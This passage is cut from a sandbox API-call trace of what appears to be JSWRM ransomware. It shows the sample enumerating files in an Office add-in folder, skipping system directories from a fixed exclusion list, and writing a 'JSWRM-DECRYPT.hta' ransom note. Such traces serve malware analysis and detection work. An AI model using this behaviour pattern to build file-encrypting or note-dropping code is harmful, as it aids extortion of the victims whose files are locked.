dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.009] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2=".") returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="..") returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="...") returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="windows") returned -1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="recovery") returned -1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="perflogs") returned -1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="documents and settings") returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="$RECYCLE.BIN") returned 1 [0124.009] lstrcmpiW (lpString1="eu", lpString2="system volume information") returned -1 [0124.010] lstrcmpiW (lpString1="eu", lpString2="msocache") returned -1 [0124.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0124.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0124.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\jswrm-decrypt.hta")) returned 0xffffffff [0124.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0124.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0124.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0124.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0124.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0124.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0124.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.013] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.013] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.014] CloseHandle (hObject=0x314) returned 1 [0124.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0124.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0124.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0124.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0124.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0124.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\eu\\jswrm-decrypt.hta")) returned 0x20 [0124.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0124.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\eu\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40931226, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0124.019] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.019] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40931226, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.019] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.019] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.019] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7c5d9c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7c5d9c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4658, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.019] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0124.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241100, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0124.020] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40931226, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40931226, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x409576a0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0124.021] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0124.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0124.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0124.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0124.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.021] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37f90ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.021] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.022] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d2a978, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d2a978, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.022] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0124.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0124.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 